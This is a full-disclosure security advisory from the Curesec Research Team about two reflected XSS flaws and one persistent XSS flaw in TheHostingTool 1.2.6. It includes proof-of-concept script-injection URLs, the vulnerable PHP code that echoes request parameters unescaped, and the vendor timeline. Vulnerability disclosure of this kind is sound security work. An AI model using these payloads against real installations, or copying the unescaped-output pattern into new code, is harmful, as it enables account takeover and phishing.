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Message-ID: <0Lwnl2-1aUvOO2KmO-016L9u@mrelayeu.kundenserver.de>
Date: Tue, 03 Nov 2015 12:01:23 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] TheHostingTool 1.2.6: Multiple XSS

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    TheHostingTool 1.2.6
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      https://thehostingtool.com/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/07/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Description

There are two reflected and one persistent XSS in TheHostingTool 1.2.6. With
this, it is possible to bypass CSRF protection, inject JavaScript keyloggers,
or perform phishing attacks.

3. Details

Reflected XSS 1

Proof of Concept:


http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=notice&message=<script>alert(1)</script>&status

Code:


        includes/ajax.php
            function notice() {
                global $style;
                if(isset($_REQUEST['status']) and isset($_REQUEST['message'])) {
                    if($_REQUEST['status'] == "good") {
                        $status = true;
                    } else {
                        $status = false;
                    }
                    echo $style->notice($status, $_REQUEST['message']);
                }
                return true;
            }

        includes/class_style.php
            public function notice($good, $message) {
                if($good) {
                    //Cool! Everything's OK.
                    $color = "green";
                }
                else {
                    //Oh no! It's a bad message!
                    $color = "red";
                }
                $notice = '<strong><em style="color: '. $color .';">';
                $notice .= $message;
                $notice .= '</em></strong>';
                return $notice;
            }

Reflected XSS 2

Proof of Concept:


http://localhost//ecommerce/THTv1.2.6/admin/?page=invoices&pay&iid="><script>alert(1)</script>

Code:


        invoices.php:
            class page {
                    public function content(){ # Displays the page
                            global $style, $db, $main, $invoice;
                            if(isset($_GET['iid']) and isset($_GET['pay'])){
                                    $invoice->set_paid($_GET['iid']);
                                    echo "<span style='color:green'>Invoice #{$_GET['iid']} marked as paid. <a href='index.php?page=invoices&iid={$_GET['iid']}&unpay=true'>Undo this action</a></span>";
                            }
                            elseif(isset($_GET['iid']) and isset($_GET['unpay'])){
                                    $invoice->set_unpaid($_GET['iid']);
                                    echo "<span style='color:red'>Invoice {$_GET['iid']} marked as unpaid. <a href='index.php?page=invoices&iid={$_GET['iid']}&pay=true'>Undo this action</a></span>";
                            }

Persistent XSS

Proof of Concept:

 1. Create a new order here: http://localhost/ecommerce/THTv1.2.6/order/
 2. When asked for a domain, enter: http://ex.<script>alert(1)</script>.com
 3. visit http://localhost/ecommerce/THTv1.2.6/admin/?page=logs or http://
    localhost/ecommerce/THTv1.2.6/admin/?page=users&sub=search&do=USERID

4. Solution

This issue has not been fixed

5. Report Timeline

09/07/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/TheHostingTool-126-Multiple-XSS-78.html

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